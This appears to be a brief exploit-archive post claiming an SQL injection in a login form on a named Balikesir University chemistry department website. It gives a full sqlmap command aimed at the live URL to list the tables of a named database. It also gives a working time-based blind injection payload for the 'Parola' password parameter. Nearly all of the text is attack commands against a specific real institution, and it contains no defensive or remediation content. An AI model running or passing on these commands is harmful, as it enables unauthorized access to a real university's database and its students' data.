======================================================================================|
| # Title : Balikesir University SQL Injection Vulnerability |
| # Author : Xale |
| # Tested on : Kali Linux |
======================================================================================|
sqlmap payload : sqlmap -u "https://kimya.balikesir.edu.tr/KimyaBolumuNew/indexogr.php" --forms --skip-waf --risk=3 --level=5 --threads=7 --no-cast -D KimyaBolumu --tables
---
Parameter: Parola (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: TCKimlik=JqOY&Parola=' AND (SELECT 4080 FROM (SELECT(SLEEP(5)))WRtb) AND 'VNiD'='VNiD&GirisSekli=Ogrenci&giris=TAMAM
---
:=========================================================================================================================
=======================================================================================================================================